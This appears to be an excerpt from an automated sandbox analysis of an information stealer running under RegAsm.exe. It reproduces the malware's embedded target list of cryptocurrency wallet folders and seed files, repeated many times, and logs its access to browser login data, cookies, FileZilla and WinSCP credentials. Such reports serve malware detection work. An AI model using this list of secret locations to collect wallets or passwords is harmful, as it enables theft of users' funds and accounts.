                  Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000001.00000002.2107817674.0000000001034000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\*.*a
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: \\config\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: \\config\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\ConfigurationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
